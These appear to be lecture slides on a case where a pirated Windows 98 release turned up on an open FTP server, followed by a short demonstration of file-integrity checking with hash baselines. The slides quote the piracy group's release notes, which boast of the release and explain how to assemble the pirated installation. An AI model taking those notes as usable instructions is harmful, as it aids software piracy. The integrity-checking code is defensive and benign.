- ./open/   /calibreX/Win98.Final-PWA/file_id.diz
- ./open/   /calibreX/Win98.Final-PWA/PWA.NFO
- ./open/   /calibreX/Win98.Final-PWA/pwa98cba.zip
- ./open/   /calibreX/Win98.Final-PWA/pwa98cbd.good.zip
- ./open/   /calibreX/Win98.Final-PWA/pwa98cbb.zip
- ./open/   /calibreX/Win98.Final-PWA/pwa98cbc.zip
- ./open/   /calibreX/Win98.Final-PWA/pwa98cbd.zip
- ./open/   /calibreX/Win98.Final-PWA/pwa98cbe.zip
- . . .
- ./open/nothing_here/
- ./open/nothing_here/   /
- ./open/nothing_here/   /pwa98cba.zip
/Microsoft_WIndows98_FINAL_Retail_Full_Setup-PWA/
- Pirates With Attitudes
- Supplier: PWA Gods
- Cracker: N/A
- Packager: Murmillius
- Protection: Serial Number
- Type: Operating System
- Disks: 21 x 5meg
PWA.NFO
- Here it is: Windows '98 Final release - Retail Full Install!
- While every other group will be bringing you so many good programs for this operating system, it's PWA that brings you the OS itself. It is fortunate for the user community that this is the case or you would probably have ended up with a ripped down release from some other lame group missing important system files like KRNL386.exe, because disklimits are more important nowadays to these people than a working release.
PWA.NFO cont.
- You need to download the CABS and the RETAIL SETUP and unzip/unrar everything into one directory. The reason for this is that as soon as I get install keys, I can release RETAIL UPGRADE, OEM FULL and OEM UPGRADE versions and they will only take 4 meg each (the CAB zips are generic thruout all these versions, I can just package up the differences in separate zips to save everyone space and time). You just unzip whichever one you want into the same directory as the generic CAB zips.
Question: Is PWA.NFO hearsay?
What we did
- Called Microsoft's anti-piracy line.
  - Useless
- Called FBI
  - Pretty useless as well.
- Called Pace University
  - This got results
  - not necessarily the right results.
Integrity Management
- What is it?
- How do you do it?
  - Tripwire
  - Comparison copies
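An added example, neither the lecture's nor Tripwire's code, of the core of an integrity checker: a baseline of size, mode and SHA-256 for every regular file under a root, and a comparison that reports files added, removed or changed since the baseline (a comparison copy reduced to a table of hashes). demo() builds a small constructed tree in a temporary directory, tampers with it, and returns the comparison; the file names are made up to echo the incidents above.

```python
import hashlib
import json
import os
import tempfile


def snapshot(root):
    """Record size, mode and SHA-256 of every regular file under root, keyed by
    path relative to root. This table is the baseline a checker stores offline."""
    table = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            st = os.stat(full)
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            rel = os.path.relpath(full, root)
            table[rel] = {"size": st.st_size,
                          "mode": st.st_mode & 0o7777,
                          "sha256": h.hexdigest()}
    return table


def compare(baseline, current):
    """Classify the differences between two snapshots."""
    before, after = set(baseline), set(current)
    return {
        "added": sorted(after - before),
        "removed": sorted(before - after),
        "changed": sorted(p for p in before & after if baseline[p] != current[p]),
    }


def demo():
    """Baseline a constructed tree, tamper with it, report the differences.
    A modified CGI script, a dropped dot-file and a deleted config would all
    be reported even when the process list looks clean."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "cgi-bin"))
        with open(os.path.join(root, "cgi-bin", "faxsurvey"), "w") as f:
            f.write("#!/bin/sh\necho ok\n")
        with open(os.path.join(root, "inetd.conf"), "w") as f:
            f.write("imap stream tcp nowait root /usr/sbin/imapd imapd\n")
        baseline = snapshot(root)
        saved = json.dumps(baseline)      # in practice: kept on read-only media
        # Tamper: append to one file, add one hidden file, delete one file.
        with open(os.path.join(root, "cgi-bin", "faxsurvey"), "a") as f:
            f.write("# modified after baseline\n")
        with open(os.path.join(root, ".s"), "w") as f:
            f.write("dropped file\n")
        os.remove(os.path.join(root, "inetd.conf"))
        return compare(json.loads(saved), snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```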